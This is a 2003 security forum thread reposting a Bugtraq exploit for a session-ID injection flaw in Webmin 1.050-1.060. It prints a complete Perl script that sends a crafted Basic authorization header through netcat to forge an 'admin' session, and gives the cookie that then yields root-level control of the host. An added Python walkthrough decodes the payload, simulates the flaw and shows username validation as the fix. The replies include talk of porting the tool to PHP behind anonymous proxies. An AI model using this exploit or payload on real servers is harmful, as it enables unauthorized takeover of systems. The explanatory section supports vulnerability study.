Security Forums

Webmin 1.050 - 1.060 remote exploit - Dangerous

Networking/Security Forums Index -> Exploits // System Weaknesses
ShaolinTiger (Forum Fanatic)
Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia
PostPosted: Mon Feb 24, 2003 6:19 pm    Post subject: Webmin 1.050 - 1.060 remote exploit - Dangerous

From Bugtraq today.

Attached is an exploit for the latest Webmin vulnerability. It relies on a
non-default setting (passdelay) being enabled.

Webmin can verify user authentication by use of a session ID (SID) that is
assigned when a user successfully authenticates to Webmin. It is possible to
inject a fake SID into the session ID database by using a malicious username
containing control sequences used internally by Webmin.

This exploit simply creates a SID of 1234567890 for the user 'admin'. Then, it
is a simple case of creating a cookie in your favorite browser containing:

sid=1234567890; testing=1

Such that the Cookie HTTP header contains:

Cookie: sid=1234567890; testing=1

When the webmin server receives this cookie, it is verified as an authentic
SID and an attacker can take complete control of the Webmin server... this is
basically root access to the box it is running on.

Cheers,
Carl

webmin-exploit.pl

Code:
#!/usr/bin/perl
#
# Exploit for Webmin 1.050 -> 1.060 by Carl Livitt
#
# Inserts a fake session_id into the sessions list of webmin.
# Does no error checking... if remote host is not found, no
# error will be reported.
#
use strict;
use warnings;

print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
print "By Carl Livitt <carl at learningshophull dot co dot uk>\n\n";

# Path to netcat; adjust if your system installs it as /usr/bin/nc.
my $nc = "/usr/bin/netcat";

if ($#ARGV == -1) {
   print "Syntax:\n\t$0 hostname\n";
   exit(1);
}

my $hostname = $ARGV[0];

if (! -x $nc) {
   print "netcat not found!\n";
   exit(2);
}

# Pipe one request into netcat on Webmin's default port (10000) and throw
# away whatever the server replies. The Basic credential below decodes to
# the username "a a 1\nnew 1234567890 admin" and the password "password":
# the embedded newline is what smuggles the "new 1234567890 admin" line
# into the session database (only when passdelay is enabled, per the post).
open(NC, "|$nc $hostname 10000 >/dev/null 2>&1")
   or die "cannot run $nc: $!\n";
print NC "GET / HTTP/1.1\n";
print NC "Host: $hostname\n";
print NC "User-agent: webmin\n";
print NC "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n";
close(NC);

print "You should now have a session_id of 1234567890 for user 'admin' on host $hostname.\n";
print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
print "be authenticated to the webmin server!\n\n";
print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";
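The mechanism Carl's note describes, as an added example that is neither code from the post nor Webmin's own source. It first decodes the token hard-coded in the exploit (it is exactly `a a 1\nnew 1234567890 admin:password`, i.e. a username with an embedded newline and a throwaway password), then runs that credential against a simplified stand-in for a server whose session database is fed as one command per line with the username interpolated unescaped. The command names and field order of that stand-in, the username policy used by the hardened variant, the sample account and the client IP are all assumptions made for the example; what it shows is how the `new` line rides in on the failed login, why `passdelay` has to be on, and what the validation that stops it looks like.

```python
import base64
import re

# Authorization token hard-coded in the posted exploit.  Decoding it is the
# first check to make before running anyone else's exploit code.
POSTED_TOKEN = "YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ="

# What the token contains: the username carries a newline and a second
# command; the password is filler, the login is meant to fail.
INJECTED_USER = "a a 1\nnew 1234567890 admin"
INJECTED_PASS = "password"

# Assumed username policy for the hardened variant (not Webmin's rule).
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,64}")


def decode_basic(token):
    """Decode an HTTP Basic credential into (username, password)."""
    user, _, password = base64.b64decode(token).decode("latin-1").partition(":")
    return user, password


def encode_basic(user, password):
    """Build the value that follows 'Authorization: Basic '."""
    return base64.b64encode(f"{user}:{password}".encode("latin-1")).decode("ascii")


class SessionServer:
    """Simplified stand-in (an assumption, not miniserv's code) for a server
    whose session database is a stream of one-line commands, with the
    client-supplied username interpolated unescaped:

        delay <user> <ip> <n>   record a failed login (passdelay bookkeeping)
        new <sid> <user> <ip>   register a session id after a good login

    Extra fields are ignored, as a Perl 'split' into a fixed list of
    variables ignores them.
    """

    def __init__(self, passdelay, validate_usernames):
        self.passdelay = passdelay
        self.validate_usernames = validate_usernames
        self.accounts = {"admin": "correct horse"}  # constructed sample account
        self.sessions = {}                          # sid -> user
        self.failures = {}                          # user -> failed attempts
        self.next_sid = 1000

    def _command(self, line):
        parts = line.split(" ")
        if parts[0] == "new" and len(parts) >= 3:
            self.sessions[parts[1]] = parts[2]
        elif parts[0] == "delay" and len(parts) >= 4 and parts[3].isdigit():
            self.failures[parts[1]] = self.failures.get(parts[1], 0) + int(parts[3])
        # anything else is dropped silently

    def _write(self, text):
        # The flaw: the raw username is inside 'text', so a newline in it
        # ends the server's command and starts one the client chose.
        for line in text.split("\n"):
            if line:
                self._command(line)

    def login(self, token, ip):
        user, password = decode_basic(token)
        # fullmatch, not match() with '$': '$' also matches before a trailing
        # newline, so 'admin\n' would slip through an anchored match().
        if self.validate_usernames and not USERNAME_RE.fullmatch(user):
            return None
        if self.accounts.get(user) == password:
            sid = str(self.next_sid)
            self.next_sid += 1
            self._write(f"new {sid} {user} {ip}\n")
            return sid
        if self.passdelay:
            self._write(f"delay {user} {ip} 1\n")
        return None

    def cookie_is_valid(self, sid):
        """What the server does with 'Cookie: sid=...' on the next request."""
        return sid in self.sessions


def demo():
    """Run the posted token against three configurations; True = forged SID accepted."""
    results = {}
    for name, passdelay, validate in (("vulnerable", True, False),
                                      ("hardened", True, True),
                                      ("passdelay_off", False, False)):
        server = SessionServer(passdelay, validate)
        server.login(POSTED_TOKEN, "10.0.0.5")
        results[name] = server.cookie_is_valid("1234567890")
    return results


if __name__ == "__main__":
    print(decode_basic(POSTED_TOKEN))
    print(demo())
```

In the vulnerable configuration the failed login writes `delay a a 1\nnew 1234567890 admin 10.0.0.5 1`, which the line reader sees as two commands; the leading `a a 1` in the username exists only to make the first of them a well-formed `delay` line. With `passdelay` off nothing is written on a failed login, which is why the post calls it a precondition. The hardened variant rejects the username before anything reaches the session store; escaping or length-checking alone would not help, since the problem is the unescaped newline.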
dan (Just Arrived)
Joined: 24 Feb 2003
Posts: 0
PostPosted: Tue Feb 25, 2003 12:53 pm

Nice one, is there source or is it yours?
ThePsyko (SF Mod)
Joined: 17 Oct 2002
Posts: 16777178
Location: California
PostPosted: Wed Feb 26, 2003 4:44 am

Damn, I can't believe what a geek I've become... I took one look at that source and thought how simple it would be to port that to PHP, dump the netcat (make it independent), add the ability to pipe it through an anonymous HTTP proxy and slap a web interface on it...

I think I need a life lol
flw (Forum Fanatic)
Joined: 27 May 2002
Posts: 16777215
Location: U.S.A.
PostPosted: Wed Feb 26, 2003 5:18 am

Since this would really only be a threat from an inside source, wouldn't an old rule of thumb resolve this? Kill all unused services. Then, when needed, restart the service and when done kill it. Problem solved? Or am I missing something?

This is what I do with sshd due to outside access.
chipmunktised (Just Arrived)
Joined: 14 Feb 2003
Posts: 0
PostPosted: Fri Feb 28, 2003 4:25 pm

Nice. I'll test it out on a trusted zone from friends of mine. Pretty nice deal.
All times are GMT + 2 Hours